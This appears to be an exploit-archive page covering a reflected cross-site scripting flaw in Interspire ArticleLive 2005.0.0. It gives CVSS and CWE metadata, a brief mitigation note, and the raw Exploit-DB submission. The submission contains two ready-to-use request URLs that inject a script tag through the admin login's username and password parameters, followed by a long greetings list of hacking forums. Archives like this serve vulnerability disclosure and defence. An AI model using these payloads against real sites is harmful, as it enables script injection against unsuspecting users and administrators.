header-logo
Suggest Exploit
vendor:
ArticleLive
by:
indoushka
7.5
CVSS
HIGH
Cross Site Scripting
79
CWE
Product Name: ArticleLive
Affected Version From: 2005.0.0
Affected Version To: 2005.0.0
Patch Exists: NO
Related CWE: N/A
CPE: a:interspire:articlelive:2005.0.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux
2005

ArticleLive PHP Version 2005.0.0 Cross Site Scripting Vulnerability

ArticleLive PHP Version 2005.0.0 is vulnerable to Cross Site Scripting. An attacker can inject malicious JavaScript code in the username and password fields of the login page. This malicious code will be executed in the browser of the victim when they visit the vulnerable page.

Mitigation:

Input validation should be used to prevent malicious code from being injected into the application.
Source

Exploit-DB raw data:

========================================================================================                  
| # Title    : ArticleLive PHP Version 2005.0.0 Cross Site Scripting Vulnerability     |
| # Author   : indoushka                                                               |
| # email    : indoushka@hotmail.com                                                   |
| # Home     : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)       
| # Web Site : www.iq-ty.com                                                           |
| # Script   : Interspire ArticleLive 2005 Copyright Interspire                        |
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)       |
| # Bug      : XSS                                                                     | 
======================      Exploit By indoushka       =================================
| # Exploit  : 
| 
| 1- http://127.0.0.1/lgc-alpn/admin/index.php?ToDo=processLogin?username=>"><ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt>&password=indoushka&SubmitButton=Login
| 2- http://127.0.0.1/lgc-alpn/admin/index.php?ToDo=processLogin?username=test&password=>"><ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt>&SubmitButton=Login
| 
================================   Dz-Ghost Team   ========================================
Greetz : Exploit-db Team (loneferret+Exploits+dookie2000ca)
all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 * www.hackteach.org
Rafik (Tinjah.com) * Yashar (sc0rpion.ir) * Silitoad * redda * mourad (dgsn.dz) * www.cyber-mirror.org
www.albasrah-forums.com * www.amman-dj.com * www.forums.ibb7.com * www.maker-sat.com * www.owned-m.com
www.vb.7lanet.com * www.3kalam.com * Stake (v4-team.com) * www.3kalam.com * www.dev-chat.com  
www.al7ra.com * Cyb3r IntRue (avengers team) * www.securityreason.com * www.packetstormsecurity.org
www.sazcart.com * www.best-sec.net * www.app.feeddigest.com * www.forum.brg8.com * www.zone-h.net
www.m-y.cc * www.hacker.ps * no-exploit.com * www.bug-blog.de * www.gem-flash.com * www.soqor.org
www.h4ckf0ru.com * www.bawassil.com * www.host4ll.com * www.hacker-top.com * www.xp10.me 
www.forums.soqor.net * www.alkrsan.net * blackc0der (www.forum.aria-security.com)  
SoldierOfAllah (www.m4r0c-s3curity.cc)www.arhack.net * www.google.com * www.np-alm7bh.com 
www.lyloo59.skyrock.com * www.sec-eviles.com * www.snakespc.com * www.kadmiwe.net * www.syrcafe.com 
www.mriraq.com * www.dzh4cker.l9l.org * www.goyelang.cn * www.h-t.cc * www.arabic-m.com * www.74ck3r.com 
r1z (www.sec-r1z.com) * omanroot.com * www.bdr130.net * www.zac003.persiangig.ir * www.0xblackhat.ir
www.mormoroth.net * www.securitywall.org * www.sec-code.com *
-------------------------------------------------------------------------------------------

Navigation

Suggest Exploit

Services By CQR